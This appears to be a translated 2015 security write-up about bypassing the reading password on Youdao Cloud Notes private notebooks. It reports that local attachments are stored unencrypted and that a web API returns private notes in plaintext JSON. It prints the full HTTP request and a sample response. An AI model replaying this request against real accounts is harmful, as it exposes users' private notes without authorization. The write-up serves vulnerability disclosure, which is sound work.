Bypass youdao cloud note reading Password

Bypass youdao cloud note reading Password

I am a fan of youdao cloud notes. I have nothing to test today.

Note has a private Notebook function. You need to enter the reading password during reading, so we can keep important things confidential. When you click another notebook, the notebook with a Read Password is automatically locked.
 

Improper design 1: private notebook accessories can be read at will

Find the storage directory of the notebook
 

The folder name in the directory is the checksum of the notes.
 

Then, let's find out if there are any local files in the private notes? Encrypted?
 

 

The answer is no. attachments to private local notes are not encrypted.

In summary, local private note attachments are accessible.







Improper design 2: arbitrary viewing of private notes



Because it's cloud notes, mobile phones, computers, and web.

Try to log on to the web from the client (client Authorization --> web, here the client is logged on, but we did not read the password or login password)

Find the client's jump link and click "invite friends" (if my browser clears all cookies)
 

 

After a series of cross-origin authorization jumps to the website, at this time we cannot access the authorization of the 126 163 domain, here only youdao.com


 

At this time, click the email icon and you need a password to enter the mailbox.

Go to web cloud notes
 

Password is also required for web private notes
 

But the design is flawed. We click private notes and capture packets.
 

Private notes are displayed at a Glance. If "encrypted" is displayed in JSON, no matter how many private notes are displayed, they are returned in plaintext in json array format.

payload: POST /yws/mapi/search?method=get&keyfrom=web HTTP/1.1 Accept: application/json, text/javascript, */*; q=0.01 Content-Type: application/x-www-form-urlencoded X-Requested-With: XMLHttpRequest Referer: http://note.youdao.com/web/list?notebook=%2FFBFBFA20CF98469F9BF19C1F53C1E772&sortMode=0¬e=%2F6EDExxx Accept-Language: zh-CN Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Proxy-Connection: Keep-Alive Content-Length: 70 Host: note.youdao.com Pragma: no-cache Cookie: xxxx  nb=%2FFBFBFA20xxxx   response:   HTTP/1.1 200 OK Server: Tengine Date: Thu, 08 Jan 2015 05:05:33 GMT Content-Type: text/json; charset=UTF-8 Content-Length: 589 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache, no-store, must-revalidate Expires: Thu, 01 Jan 1970 00:00:00 GMT Content-Language: zh-CN Cache-Control: no-cache  [1,[{"d":0,"tl":"??￥è?°1","mt":1420693290,"nn":0,"tg":"","sc":0,"checksum":"758d018393527ab0dcf1e185e21c4c60","favorite":0,"ct":1420693196,"au":"","v":3563,"encrypted":0,"r":0,"p":"/FBFBFA20CF98469F9BF19C1F53C1E772/8AC2996E50B642EA9788D57B844F3399","su":"","created_product":"YNote-PC","ng":"","del":0,"pp":{"nbtl":"é??èˉ??ˉ****?μ?èˉ?","dg":"??ˉ********¨??·****??lisdfte??ˉ****ˉ****???te3st999332","thmurl":null,"WHOLE_FILE_TYPE":"OMAPFILE","ressize":"0","tp":"2","FILE_IDENTIFIER":"6B6A960617DC48DC8567DFB16D40A469","spaceused":"303","resnum":"1"},"et":0,"sz":3814,"er":0,"ps":0,"dr":0}]]

In short, all contents in private notes that bypass password protection.